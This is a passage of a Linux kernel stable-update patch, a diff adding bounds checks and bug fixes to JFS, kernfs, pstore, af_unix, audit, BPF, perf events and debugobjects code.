++static void dbSplit(dmtree_t *tp, int leafno, int splitsz, int newval, bool is_ctl);
++static int dbBackSplit(dmtree_t *tp, int leafno, bool is_ctl);
++static int dbJoin(dmtree_t *tp, int leafno, int newval, bool is_ctl);
++static void dbAdjTree(dmtree_t *tp, int leafno, int newval, bool is_ctl);
+ static int dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc,
+ 		    int level);
+ static int dbAllocAny(struct bmap * bmp, s64 nblocks, int l2nb, s64 * results);
+@@ -2103,7 +2103,7 @@ static int dbFreeDmap(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 		 * system.
+ 		 */
+ 		if (dp->tree.stree[word] == NOFREE)
+-			dbBackSplit((dmtree_t *) & dp->tree, word);
++			dbBackSplit((dmtree_t *)&dp->tree, word, false);
+ 
+ 		dbAllocBits(bmp, dp, blkno, nblocks);
+ 	}
+@@ -2189,7 +2189,7 @@ static void dbAllocBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 			 * the binary system of the leaves if need be.
+ 			 */
+ 			dbSplit(tp, word, BUDMIN,
+-				dbMaxBud((u8 *) & dp->wmap[word]));
++				dbMaxBud((u8 *)&dp->wmap[word]), false);
+ 
+ 			word += 1;
+ 		} else {
+@@ -2229,7 +2229,7 @@ static void dbAllocBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 				 * system of the leaves to reflect the current
+ 				 * allocation (size).
+ 				 */
+-				dbSplit(tp, word, size, NOFREE);
++				dbSplit(tp, word, size, NOFREE, false);
+ 
+ 				/* get the number of dmap words handled */
+ 				nw = BUDSIZE(size, BUDMIN);
+@@ -2336,7 +2336,7 @@ static int dbFreeBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 			/* update the leaf for this dmap word.
+ 			 */
+ 			rc = dbJoin(tp, word,
+-				    dbMaxBud((u8 *) & dp->wmap[word]));
++				    dbMaxBud((u8 *)&dp->wmap[word]), false);
+ 			if (rc)
+ 				return rc;
+ 
+@@ -2369,7 +2369,7 @@ static int dbFreeBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 
+ 				/* update the leaf.
+ 				 */
+-				rc = dbJoin(tp, word, size);
++				rc = dbJoin(tp, word, size, false);
+ 				if (rc)
+ 					return rc;
+ 
+@@ -2521,16 +2521,16 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+ 		 * that it is at the front of a binary buddy system.
+ 		 */
+ 		if (oldval == NOFREE) {
+-			rc = dbBackSplit((dmtree_t *) dcp, leafno);
++			rc = dbBackSplit((dmtree_t *)dcp, leafno, true);
+ 			if (rc) {
+ 				release_metapage(mp);
+ 				return rc;
+ 			}
+ 			oldval = dcp->stree[ti];
+ 		}
+-		dbSplit((dmtree_t *) dcp, leafno, dcp->budmin, newval);
++		dbSplit((dmtree_t *) dcp, leafno, dcp->budmin, newval, true);
+ 	} else {
+-		rc = dbJoin((dmtree_t *) dcp, leafno, newval);
++		rc = dbJoin((dmtree_t *) dcp, leafno, newval, true);
+ 		if (rc) {
+ 			release_metapage(mp);
+ 			return rc;
+@@ -2561,7 +2561,7 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+ 				 */
+ 				if (alloc) {
+ 					dbJoin((dmtree_t *) dcp, leafno,
+-					       oldval);
++					       oldval, true);
+ 				} else {
+ 					/* the dbJoin() above might have
+ 					 * caused a larger binary buddy system
+@@ -2571,9 +2571,9 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+ 					 */
+ 					if (dcp->stree[ti] == NOFREE)
+ 						dbBackSplit((dmtree_t *)
+-							    dcp, leafno);
++							    dcp, leafno, true);
+ 					dbSplit((dmtree_t *) dcp, leafno,
+-						dcp->budmin, oldval);
++						dcp->budmin, oldval, true);
+ 				}
+ 
+ 				/* release the buffer and return the error.
+@@ -2621,7 +2621,7 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+  *
+  * serialization: IREAD_LOCK(ipbmap) or IWRITE_LOCK(ipbmap) held on entry/exit;
+  */
+-static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
++static void dbSplit(dmtree_t *tp, int leafno, int splitsz, int newval, bool is_ctl)
+ {
+ 	int budsz;
+ 	int cursz;
+@@ -2643,7 +2643,7 @@ static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
+ 		while (cursz >= splitsz) {
+ 			/* update the buddy's leaf with its new value.
+ 			 */
+-			dbAdjTree(tp, leafno ^ budsz, cursz);
++			dbAdjTree(tp, leafno ^ budsz, cursz, is_ctl);
+ 
+ 			/* on to the next size and buddy.
+ 			 */
+@@ -2655,7 +2655,7 @@ static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
+ 	/* adjust the dmap tree to reflect the specified leaf's new
+ 	 * value.
+ 	 */
+-	dbAdjTree(tp, leafno, newval);
++	dbAdjTree(tp, leafno, newval, is_ctl);
+ }
+ 
+ 
+@@ -2686,7 +2686,7 @@ static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
+  *
+  * serialization: IREAD_LOCK(ipbmap) or IWRITE_LOCK(ipbmap) held on entry/exit;
+  */
+-static int dbBackSplit(dmtree_t * tp, int leafno)
++static int dbBackSplit(dmtree_t *tp, int leafno, bool is_ctl)
+ {
+ 	int budsz, bud, w, bsz, size;
+ 	int cursz;
+@@ -2737,7 +2737,7 @@ static int dbBackSplit(dmtree_t * tp, int leafno)
+ 				 * system in two.
+ 				 */
+ 				cursz = leaf[bud] - 1;
+-				dbSplit(tp, bud, cursz, cursz);
++				dbSplit(tp, bud, cursz, cursz, is_ctl);
+ 				break;
+ 			}
+ 		}
+@@ -2765,7 +2765,7 @@ static int dbBackSplit(dmtree_t * tp, int leafno)
+  *
+  * RETURN VALUES: none
+  */
+-static int dbJoin(dmtree_t * tp, int leafno, int newval)
++static int dbJoin(dmtree_t *tp, int leafno, int newval, bool is_ctl)
+ {
+ 	int budsz, buddy;
+ 	s8 *leaf;
+@@ -2820,12 +2820,12 @@ static int dbJoin(dmtree_t * tp, int leafno, int newval)
+ 			if (leafno < buddy) {
+ 				/* leafno is the left buddy.
+ 				 */
+-				dbAdjTree(tp, buddy, NOFREE);
++				dbAdjTree(tp, buddy, NOFREE, is_ctl);
+ 			} else {
+ 				/* buddy is the left buddy and becomes
+ 				 * leafno.
+ 				 */
+-				dbAdjTree(tp, leafno, NOFREE);
++				dbAdjTree(tp, leafno, NOFREE, is_ctl);
+ 				leafno = buddy;
+ 			}
+ 
+@@ -2838,7 +2838,7 @@ static int dbJoin(dmtree_t * tp, int leafno, int newval)
+ 
+ 	/* update the leaf value.
+ 	 */
+-	dbAdjTree(tp, leafno, newval);
++	dbAdjTree(tp, leafno, newval, is_ctl);
+ 
+ 	return 0;
+ }
+@@ -2859,15 +2859,20 @@ static int dbJoin(dmtree_t * tp, int leafno, int newval)
+  *
+  * RETURN VALUES: none
+  */
+-static void dbAdjTree(dmtree_t * tp, int leafno, int newval)
++static void dbAdjTree(dmtree_t *tp, int leafno, int newval, bool is_ctl)
+ {
+ 	int lp, pp, k;
+-	int max;
++	int max, size;
++
++	size = is_ctl ? CTLTREESIZE : TREESIZE;
+ 
+ 	/* pick up the index of the leaf for this leafno.
+ 	 */
+ 	lp = leafno + le32_to_cpu(tp->dmt_leafidx);
+ 
++	if (WARN_ON_ONCE(lp >= size || lp < 0))
++		return;
++
+ 	/* is the current value the same as the old value ?  if so,
+ 	 * there is nothing to do.
+ 	 */
+diff --git a/fs/jfs/jfs_dtree.c b/fs/jfs/jfs_dtree.c
+index 92b7c533407c1..031d8f570f581 100644
+--- a/fs/jfs/jfs_dtree.c
++++ b/fs/jfs/jfs_dtree.c
+@@ -633,6 +633,11 @@ int dtSearch(struct inode *ip, struct component_name * key, ino_t * data,
+ 		for (base = 0, lim = p->header.nextindex; lim; lim >>= 1) {
+ 			index = base + (lim >> 1);
+ 
++			if (stbl[index] < 0) {
++				rc = -EIO;
++				goto out;
++			}
++
+ 			if (p->header.flag & BT_LEAF) {
+ 				/* uppercase leaf name to compare */
+ 				cmp =
+@@ -1970,7 +1975,7 @@ static int dtSplitRoot(tid_t tid,
+ 		do {
+ 			f = &rp->slot[fsi];
+ 			fsi = f->next;
+-		} while (fsi != -1);
++		} while (fsi >= 0);
+ 
+ 		f->next = n;
+ 	}
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index 6ed2e1d4c894f..ac42f8ee553fc 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -2179,6 +2179,9 @@ static int diNewExt(struct inomap * imap, struct iag * iagp, int extno)
+ 	/* get the ag and iag numbers for this iag.
+ 	 */
+ 	agno = BLKTOAG(le64_to_cpu(iagp->agstart), sbi);
++	if (agno >= MAXAG || agno < 0)
++		return -EIO;
++
+ 	iagno = le32_to_cpu(iagp->iagnum);
+ 
+ 	/* check if this is the last free extent within the
+diff --git a/fs/jfs/jfs_mount.c b/fs/jfs/jfs_mount.c
+index 48d1f70f786cf..21d8d4a5c67a1 100644
+--- a/fs/jfs/jfs_mount.c
++++ b/fs/jfs/jfs_mount.c
+@@ -172,15 +172,15 @@ int jfs_mount(struct super_block *sb)
+ 	}
+ 	jfs_info("jfs_mount: ipimap:0x%p", ipimap);
+ 
+-	/* map further access of per fileset inodes by the fileset inode */
+-	sbi->ipimap = ipimap;
+-
+ 	/* initialize fileset inode allocation map */
+ 	if ((rc = diMount(ipimap))) {
+ 		jfs_err("jfs_mount: diMount failed w/rc = %d", rc);
+ 		goto err_ipimap;
+ 	}
+ 
++	/* map further access of per fileset inodes by the fileset inode */
++	sbi->ipimap = ipimap;
++
+ 	return rc;
+ 
+ 	/*
+diff --git a/fs/kernfs/dir.c b/fs/kernfs/dir.c
+index 44842e6cf0a9b..a00e11ebfa775 100644
+--- a/fs/kernfs/dir.c
++++ b/fs/kernfs/dir.c
+@@ -669,6 +669,18 @@ struct kernfs_node *kernfs_new_node(struct kernfs_node *parent,
+ {
+ 	struct kernfs_node *kn;
+ 
++	if (parent->mode & S_ISGID) {
++		/* this code block imitates inode_init_owner() for
++		 * kernfs
++		 */
++
++		if (parent->iattr)
++			gid = parent->iattr->ia_gid;
++
++		if (flags & KERNFS_DIR)
++			mode |= S_ISGID;
++	}
++
+ 	kn = __kernfs_new_node(kernfs_root(parent), parent,
+ 			       name, mode, uid, gid, flags);
+ 	if (kn) {
+diff --git a/fs/pstore/ram.c b/fs/pstore/ram.c
+index f3fa3625d772c..e15b4631364a8 100644
+--- a/fs/pstore/ram.c
++++ b/fs/pstore/ram.c
+@@ -519,6 +519,7 @@ static int ramoops_init_przs(const char *name,
+ 	}
+ 
+ 	zone_sz = mem_sz / *cnt;
++	zone_sz = ALIGN_DOWN(zone_sz, 2);
+ 	if (!zone_sz) {
+ 		dev_err(dev, "%s zone size == 0\n", name);
+ 		goto fail;
+diff --git a/include/asm-generic/numa.h b/include/asm-generic/numa.h
+index 1a3ad6d298330..c32e0cf23c909 100644
+--- a/include/asm-generic/numa.h
++++ b/include/asm-generic/numa.h
+@@ -35,6 +35,7 @@ int __init numa_add_memblk(int nodeid, u64 start, u64 end);
+ void __init numa_set_distance(int from, int to, int distance);
+ void __init numa_free_distance(void);
+ void __init early_map_cpu_to_node(unsigned int cpu, int nid);
++int __init early_cpu_to_node(int cpu);
+ void numa_store_cpu_info(unsigned int cpu);
+ void numa_add_cpu(unsigned int cpu);
+ void numa_remove_cpu(unsigned int cpu);
+@@ -46,6 +47,7 @@ static inline void numa_add_cpu(unsigned int cpu) { }
+ static inline void numa_remove_cpu(unsigned int cpu) { }
+ static inline void arch_numa_init(void) { }
+ static inline void early_map_cpu_to_node(unsigned int cpu, int nid) { }
++static inline int early_cpu_to_node(int cpu) { return 0; }
+ 
+ #endif	/* CONFIG_NUMA */
+ 
+diff --git a/include/asm-generic/unaligned.h b/include/asm-generic/unaligned.h
+index 699650f819706..a84c64e5f11ec 100644
+--- a/include/asm-generic/unaligned.h
++++ b/include/asm-generic/unaligned.h
+@@ -104,9 +104,9 @@ static inline u32 get_unaligned_le24(const void *p)
+ 
+ static inline void __put_unaligned_be24(const u32 val, u8 *p)
+ {
+-	*p++ = val >> 16;
+-	*p++ = val >> 8;
+-	*p++ = val;
++	*p++ = (val >> 16) & 0xff;
++	*p++ = (val >> 8) & 0xff;
++	*p++ = val & 0xff;
+ }
+ 
+ static inline void put_unaligned_be24(const u32 val, void *p)
+@@ -116,9 +116,9 @@ static inline void put_unaligned_be24(const u32 val, void *p)
+ 
+ static inline void __put_unaligned_le24(const u32 val, u8 *p)
+ {
+-	*p++ = val;
+-	*p++ = val >> 8;
+-	*p++ = val >> 16;
++	*p++ = val & 0xff;
++	*p++ = (val >> 8) & 0xff;
++	*p++ = (val >> 16) & 0xff;
+ }
+ 
+ static inline void put_unaligned_le24(const u32 val, void *p)
+@@ -128,12 +128,12 @@ static inline void put_unaligned_le24(const u32 val, void *p)
+ 
+ static inline void __put_unaligned_be48(const u64 val, u8 *p)
+ {
+-	*p++ = val >> 40;
+-	*p++ = val >> 32;
+-	*p++ = val >> 24;
+-	*p++ = val >> 16;
+-	*p++ = val >> 8;
+-	*p++ = val;
++	*p++ = (val >> 40) & 0xff;
++	*p++ = (val >> 32) & 0xff;
++	*p++ = (val >> 24) & 0xff;
++	*p++ = (val >> 16) & 0xff;
++	*p++ = (val >> 8) & 0xff;
++	*p++ = val & 0xff;
+ }
+ 
+ static inline void put_unaligned_be48(const u64 val, void *p)
+diff --git a/include/drm/drm_color_mgmt.h b/include/drm/drm_color_mgmt.h
+index 81c298488b0c8..6b5eec10c3db3 100644
+--- a/include/drm/drm_color_mgmt.h
++++ b/include/drm/drm_color_mgmt.h
+@@ -24,6 +24,7 @@
+ #define __DRM_COLOR_MGMT_H__
+ 
+ #include <linux/ctype.h>
++#include <linux/math64.h>
+ #include <drm/drm_property.h>
+ 
+ struct drm_crtc;
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 9054a5185e1a9..31171914990a3 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -168,6 +168,7 @@ struct mipi_dsi_device_info {
+  * struct mipi_dsi_device - DSI peripheral device
+  * @host: DSI host for this peripheral
+  * @dev: driver model device node for this peripheral
++ * @attached: the DSI device has been successfully attached
+  * @name: DSI peripheral chip type
+  * @channel: virtual channel assigned to the peripheral
+  * @format: pixel format for video mode
+@@ -184,6 +185,7 @@ struct mipi_dsi_device_info {
+ struct mipi_dsi_device {
+ 	struct mipi_dsi_host *host;
+ 	struct device dev;
++	bool attached;
+ 
+ 	char name[DSI_DEV_NAME_SIZE];
+ 	unsigned int channel;
+diff --git a/include/linux/irq_work.h b/include/linux/irq_work.h
+index 8cd11a2232605..136f2980cba30 100644
+--- a/include/linux/irq_work.h
++++ b/include/linux/irq_work.h
+@@ -66,6 +66,9 @@ void irq_work_sync(struct irq_work *work);
+ void irq_work_run(void);
+ bool irq_work_needs_cpu(void);
+ void irq_work_single(void *arg);
++
++void arch_irq_work_raise(void);
++
+ #else
+ static inline bool irq_work_needs_cpu(void) { return false; }
+ static inline void irq_work_run(void) { }
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 638d2124d1cb9..3b9f4d7c40c38 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -1854,9 +1854,9 @@ static inline int pfn_valid(unsigned long pfn)
+ 	if (pfn_to_section_nr(pfn) >= NR_MEM_SECTIONS)
+ 		return 0;
+ 	ms = __pfn_to_section(pfn);
+-	rcu_read_lock();
++	rcu_read_lock_sched();
+ 	if (!valid_section(ms)) {
+-		rcu_read_unlock();
++		rcu_read_unlock_sched();
+ 		return 0;
+ 	}
+ 	/*
+@@ -1864,7 +1864,7 @@ static inline int pfn_valid(unsigned long pfn)
+ 	 * the entire section-sized span.
+ 	 */
+ 	ret = early_section(ms) || pfn_section_valid(ms, pfn);
+-	rcu_read_unlock();
++	rcu_read_unlock_sched();
+ 
+ 	return ret;
+ }
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index b76ff08506181..73cc1e7dd15ad 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3000,6 +3000,7 @@
+ #define PCI_DEVICE_ID_INTEL_82443GX_0	0x71a0
+ #define PCI_DEVICE_ID_INTEL_82443GX_2	0x71a2
+ #define PCI_DEVICE_ID_INTEL_82372FB_1	0x7601
++#define PCI_DEVICE_ID_INTEL_HDA_ARL	0x7728
+ #define PCI_DEVICE_ID_INTEL_SCH_LPC	0x8119
+ #define PCI_DEVICE_ID_INTEL_SCH_IDE	0x811a
+ #define PCI_DEVICE_ID_INTEL_E6XX_CU	0x8183
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 55ca217c626b7..0920b669b9b31 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -45,12 +45,6 @@ struct scm_stat {
+ 
+ #define UNIXCB(skb)	(*(struct unix_skb_parms *)&((skb)->cb))
+ 
+-#define unix_state_lock(s)	spin_lock(&unix_sk(s)->lock)
+-#define unix_state_unlock(s)	spin_unlock(&unix_sk(s)->lock)
+-#define unix_state_lock_nested(s) \
+-				spin_lock_nested(&unix_sk(s)->lock, \
+-				SINGLE_DEPTH_NESTING)
+-
+ /* The AF_UNIX socket */
+ struct unix_sock {
+ 	/* WARNING: sk has to be the first member */
+@@ -79,6 +73,20 @@ static inline struct unix_sock *unix_sk(const struct sock *sk)
+ }
+ #define unix_peer(sk) (unix_sk(sk)->peer)
+ 
++#define unix_state_lock(s)	spin_lock(&unix_sk(s)->lock)
++#define unix_state_unlock(s)	spin_unlock(&unix_sk(s)->lock)
++enum unix_socket_lock_class {
++	U_LOCK_NORMAL,
++	U_LOCK_SECOND,	/* for double locking, see unix_state_double_lock(). */
++	U_LOCK_DIAG, /* used while dumping icons, see sk_diag_dump_icons(). */
++};
++
++static inline void unix_state_lock_nested(struct sock *sk,
++				   enum unix_socket_lock_class subclass)
++{
++	spin_lock_nested(&unix_sk(sk)->lock, subclass);
++}
++
+ #define peer_wait peer_wq.wait
+ 
+ long unix_inq_len(struct sock *sk);
+diff --git a/include/net/ip.h b/include/net/ip.h
+index c83c09c65623f..4f11f7df7dd67 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -752,7 +752,7 @@ int ip_options_rcv_srr(struct sk_buff *skb, struct net_device *dev);
+  *	Functions provided by ip_sockglue.c
+  */
+ 
+-void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb);
++void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb, bool drop_dst);
+ void ip_cmsg_recv_offset(struct msghdr *msg, struct sock *sk,
+ 			 struct sk_buff *skb, int tlen, int offset);
+ int ip_cmsg_send(struct sock *sk, struct msghdr *msg,
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index c726da3b7d68a..2fa344cb66f60 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -1286,6 +1286,7 @@ void nft_obj_notify(struct net *net, const struct nft_table *table,
+  *	@type: stateful object numeric type
+  *	@owner: module owner
+  *	@maxattr: maximum netlink attribute
++ *	@family: address family for AF-specific object types
+  *	@policy: netlink attribute policy
+  */
+ struct nft_object_type {
+@@ -1295,6 +1296,7 @@ struct nft_object_type {
+ 	struct list_head		list;
+ 	u32				type;
+ 	unsigned int                    maxattr;
++	u8				family;
+ 	struct module			*owner;
+ 	const struct nla_policy		*policy;
+ };
+diff --git a/kernel/audit.c b/kernel/audit.c
+index 9bc0b0301198c..99127521cda86 100644
+--- a/kernel/audit.c
++++ b/kernel/audit.c
+@@ -488,15 +488,19 @@ static void auditd_conn_free(struct rcu_head *rcu)
+  * @pid: auditd PID
+  * @portid: auditd netlink portid
+  * @net: auditd network namespace pointer
++ * @skb: the netlink command from the audit daemon
++ * @ack: netlink ack flag, cleared if ack'd here
+  *
+  * Description:
+  * This function will obtain and drop network namespace references as
+  * necessary.  Returns zero on success, negative values on failure.
+  */
+-static int auditd_set(struct pid *pid, u32 portid, struct net *net)
++static int auditd_set(struct pid *pid, u32 portid, struct net *net,
++		      struct sk_buff *skb, bool *ack)
+ {
+ 	unsigned long flags;
+ 	struct auditd_connection *ac_old, *ac_new;
++	struct nlmsghdr *nlh;
+ 
+ 	if (!pid || !net)
+ 		return -EINVAL;
+@@ -508,6 +512,13 @@ static int auditd_set(struct pid *pid, u32 portid, struct net *net)
+ 	ac_new->portid = portid;
+ 	ac_new->net = get_net(net);
+ 
++	/* send the ack now to avoid a race with the queue backlog */
++	if (*ack) {
++		nlh = nlmsg_hdr(skb);
++		netlink_ack(skb, nlh, 0, NULL);
++		*ack = false;
++	}
++
+ 	spin_lock_irqsave(&auditd_conn_lock, flags);
+ 	ac_old = rcu_dereference_protected(auditd_conn,
+ 					   lockdep_is_held(&auditd_conn_lock));
+@@ -1201,7 +1212,8 @@ static int audit_replace(struct pid *pid)
+ 	return auditd_send_unicast_skb(skb);
+ }
+ 
+-static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
++static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
++			     bool *ack)
+ {
+ 	u32			seq;
+ 	void			*data;
+@@ -1294,7 +1306,8 @@ static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
+ 				/* register a new auditd connection */
+ 				err = auditd_set(req_pid,
+ 						 NETLINK_CB(skb).portid,
+-						 sock_net(NETLINK_CB(skb).sk));
++						 sock_net(NETLINK_CB(skb).sk),
++						 skb, ack);
+ 				if (audit_enabled != AUDIT_OFF)
+ 					audit_log_config_change("audit_pid",
+ 								new_pid,
+@@ -1539,9 +1552,10 @@ static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
+  * Parse the provided skb and deal with any messages that may be present,
+  * malformed skbs are discarded.
+  */
+-static void audit_receive(struct sk_buff  *skb)
++static void audit_receive(struct sk_buff *skb)
+ {
+ 	struct nlmsghdr *nlh;
++	bool ack;
+ 	/*
+ 	 * len MUST be signed for nlmsg_next to be able to dec it below 0
+ 	 * if the nlmsg_len was not aligned
+@@ -1554,9 +1568,12 @@ static void audit_receive(struct sk_buff  *skb)
+ 
+ 	audit_ctl_lock();
+ 	while (nlmsg_ok(nlh, len)) {
+-		err = audit_receive_msg(skb, nlh);
+-		/* if err or if this message says it wants a response */
+-		if (err || (nlh->nlmsg_flags & NLM_F_ACK))
++		ack = nlh->nlmsg_flags & NLM_F_ACK;
++		err = audit_receive_msg(skb, nlh, &ack);
++
++		/* send an ack if the user asked for one and audit_receive_msg
++		 * didn't already do it, or if there was an error. */
++		if (ack || err)
+ 			netlink_ack(skb, nlh, err, NULL);
+ 
+ 		nlh = nlmsg_next(nlh, &len);
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 6212e4ae084bb..34135fbd6097e 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -28,12 +28,13 @@
+  *
+  * Different map implementations will rely on rcu in map methods
+  * lookup/update/delete, therefore eBPF programs must run under rcu lock
+- * if program is allowed to access maps, so check rcu_read_lock_held in
+- * all three functions.
++ * if program is allowed to access maps, so check rcu_read_lock_held() or
++ * rcu_read_lock_trace_held() in all three functions.
+  */
+ BPF_CALL_2(bpf_map_lookup_elem, struct bpf_map *, map, void *, key)
+ {
+-	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_bh_held());
++	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_trace_held() &&
++		     !rcu_read_lock_bh_held());
+ 	return (unsigned long) map->ops->map_lookup_elem(map, key);
+ }
+ 
+@@ -49,7 +50,8 @@ const struct bpf_func_proto bpf_map_lookup_elem_proto = {
+ BPF_CALL_4(bpf_map_update_elem, struct bpf_map *, map, void *, key,
+ 	   void *, value, u64, flags)
+ {
+-	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_bh_held());
++	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_trace_held() &&
++		     !rcu_read_lock_bh_held());
+ 	return map->ops->map_update_elem(map, key, value, flags);
+ }
+ 
+@@ -66,7 +68,8 @@ const struct bpf_func_proto bpf_map_update_elem_proto = {
+ 
+ BPF_CALL_2(bpf_map_delete_elem, struct bpf_map *, map, void *, key)
+ {
+-	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_bh_held());
++	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_trace_held() &&
++		     !rcu_read_lock_bh_held());
+ 	return map->ops->map_delete_elem(map, key);
+ }
+ 
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 8d0c38a8dcf2d..1e46a84694b8a 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -1598,6 +1598,9 @@ int generic_map_delete_batch(struct bpf_map *map,
+ 	if (!max_count)
+ 		return 0;
+ 
++	if (put_user(0, &uattr->batch.count))
++		return -EFAULT;
++
+ 	key = kvmalloc(map->key_size, GFP_USER | __GFP_NOWARN);
+ 	if (!key)
+ 		return -ENOMEM;
+@@ -1657,6 +1660,9 @@ int generic_map_update_batch(struct bpf_map *map,
+ 	if (!max_count)
+ 		return 0;
+ 
++	if (put_user(0, &uattr->batch.count))
++		return -EFAULT;
++
+ 	key = kvmalloc(map->key_size, GFP_USER | __GFP_NOWARN);
+ 	if (!key)
+ 		return -ENOMEM;
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 8c7d2f4f5fbab..872d149b1959b 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -11223,9 +11223,30 @@ static DEVICE_ATTR_RW(perf_event_mux_interval_ms);
+ static struct attribute *pmu_dev_attrs[] = {
+ 	&dev_attr_type.attr,
+ 	&dev_attr_perf_event_mux_interval_ms.attr,
++	&dev_attr_nr_addr_filters.attr,
++	NULL,
++};
++
++static umode_t pmu_dev_is_visible(struct kobject *kobj, struct attribute *a, int n)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct pmu *pmu = dev_get_drvdata(dev);
++
++	if (n == 2 && !pmu->nr_addr_filters)
++		return 0;
++
++	return a->mode;
++}
++
++static struct attribute_group pmu_dev_attr_group = {
++	.is_visible = pmu_dev_is_visible,
++	.attrs = pmu_dev_attrs,
++};
++
++static const struct attribute_group *pmu_dev_groups[] = {
++	&pmu_dev_attr_group,
+ 	NULL,
+ };
+-ATTRIBUTE_GROUPS(pmu_dev);
+ 
+ static int pmu_bus_running;
+ static struct bus_type pmu_bus = {
+@@ -11261,18 +11282,11 @@ static int pmu_dev_alloc(struct pmu *pmu)
+ 	if (ret)
+ 		goto free_dev;
+ 
+-	/* For PMUs with address filters, throw in an extra attribute: */
+-	if (pmu->nr_addr_filters)
+-		ret = device_create_file(pmu->dev, &dev_attr_nr_addr_filters);
+-
+-	if (ret)
+-		goto del_dev;
+-
+-	if (pmu->attr_update)
++	if (pmu->attr_update) {
+ 		ret = sysfs_update_groups(&pmu->dev->kobj, pmu->attr_update);
+-
+-	if (ret)
+-		goto del_dev;
++		if (ret)
++			goto del_dev;
++	}
+ 
+ out:
+ 	return ret;
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index dacb80c22c4f1..5dfa582dbadd2 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -609,9 +609,8 @@ static void debug_objects_fill_pool(void)
+ static void
+ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
+ {
+-	enum debug_obj_state state;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+-	struct debug_obj *obj;
+ 	unsigned long flags;
+ 
+ 	debug_objects_fill_pool();
+@@ -632,24 +631,18 @@ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack
+ 	case ODEBUG_STATE_INIT:
+ 	case ODEBUG_STATE_INACTIVE:
+ 		obj->state = ODEBUG_STATE_INIT;
+-		break;
+-
+-	case ODEBUG_STATE_ACTIVE:
+-		state = obj->state;
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "init");
+-		debug_object_fixup(descr->fixup_init, addr, state);
+-		return;
+-
+-	case ODEBUG_STATE_DESTROYED:
+ 		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "init");
+ 		return;
+ 	default:
+ 		break;
+ 	}
+ 
++	o = *obj;
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
++	debug_print_object(&o, "init");
++
++	if (o.state == ODEBUG_STATE_ACTIVE)
++		debug_object_fixup(descr->fixup_init, addr, o.state);
+ }
+ 
+ /**
+@@ -690,11 +683,9 @@ EXPORT_SYMBOL_GPL(debug_object_init_on_stack);
+ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ {
+ 	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+-	enum debug_obj_state state;
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+-	int ret;
+ 
+ 	if (!debug_objects_enabled)
+ 		return 0;
+@@ -706,49 +697,38 @@ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+ 	obj = lookup_object_or_alloc(addr, db, descr, false, true);
+-	if (likely(!IS_ERR_OR_NULL(obj))) {
+-		bool print_object = false;
+-
